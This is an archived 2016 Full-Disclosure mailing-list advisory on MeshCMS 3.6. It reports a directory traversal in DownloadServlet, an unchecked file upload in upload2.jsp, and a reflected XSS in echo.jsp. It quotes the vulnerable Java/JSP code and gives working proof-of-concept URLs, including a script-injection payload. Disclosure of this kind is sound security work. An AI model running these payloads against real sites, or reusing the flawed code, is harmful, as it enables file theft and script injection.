lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAA0JNpRo=6Ro3ps=q0MGUGmpLzt2usrJ8_UuQpuLVnD3A7m5RQ@mail.gmail.com> Date: Tue, 5 Apr 2016 09:02:28 +0800 From: xiong piaox <yahoo860201@...il.com> To: Fulldisclosure@...lists.org Subject: [FD] MeshCMS 3.6 – Multiple vulnerabilities Exploit Title: MeshCMS 3.6 – Multiple vulnerabilities Date: 2016-04-03 Exploit Author: piaox xiong(xiongyaofu351@...gan.com.cn) Vendor Homepage: http://www.cromoteca.com/en/meshcms/ Software Link: http://www.cromoteca.com/en/meshcms/download/ Version: 3.6 Tested on: Windows OS ############# Application Description: MeshCMS is an online editing system written in Java. It provides a set of features usually included in a CMS, but it uses a more traditional approach: pages are stored in regular HTML files and all additional features are file-based, without needing a database. ############# Vulnerability Description: 1、Directory traversal Vulnerability the servlet of DownloadServlet exist Directory traversal String str = paramHttpServletRequest.getParameter("filename"); *if* (*Utils*.*isNullOrEmpty*(str)) { str = localPath.*getLastElement*(); } *try* { FileInputStream localFileInputStream = *new* FileInputStream((File)localObject); paramHttpServletResponse.setContentType("application/x-download"); paramHttpServletResponse.setHeader("Content-Disposition", "attachment; filename=\"" + str + "\""); paramHttpServletResponse.setHeader("Content-Length", Long.toString(((File)localObject).length())); *Utils*.*copyStream*(localFileInputStream, paramHttpServletResponse.getOutputStream(), *false*); } POC: http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/filemanager/upload1.jsp http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/login.jsp 2、File Upload Vulnerability the upload2.jsp don’t check the upload file’security. try { FileItem upItem = null; ServletFileUpload upload = new ServletFileUpload(new DiskFileItemFactory()); upload.setProgressListener(new UploadProgressListener(request.getSession(true))); List items = upload.parseRequest(request); Iterator iter = items.iterator(); while (iter.hasNext()) { FileItem item = (FileItem) iter.next(); if (item.getFieldName().equals("dir")) { path = new Path(item.getString()); } else if (item.getFieldName().equals("fixname")) { fixName = Utils.isTrue(item.getString()); } else if (item.getFieldName().equals("upfile") && item.getSize() > 0L) { upItem = item; } } if (upItem != null && path != null) { String fileName = new Path(upItem.getName()).getLastElement(); if (fixName) { fileName = Utils.generateUniqueName (WebUtils.fixFileName(fileName, true), webSite.getFile(path)); } ok = webSite.saveToFile(userInfo, upItem, path.add(fileName)); } 3、Non-Persistent XSS In the meshcms/meshcms/admin/ directory echo.jsp file code is as follows,exist Non-Persistent XSS try { response.resetBuffer(); } catch (IllegalStateException ex) { // } response.getWriter().write(request.getParameter("fullsrc")); %> POC: http://127.0.0.1:8080/meshcms/meshcms/admin/echo.jsp?fullsrc=%3Cscript%3Ealert%281%29%3C/script%3E _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists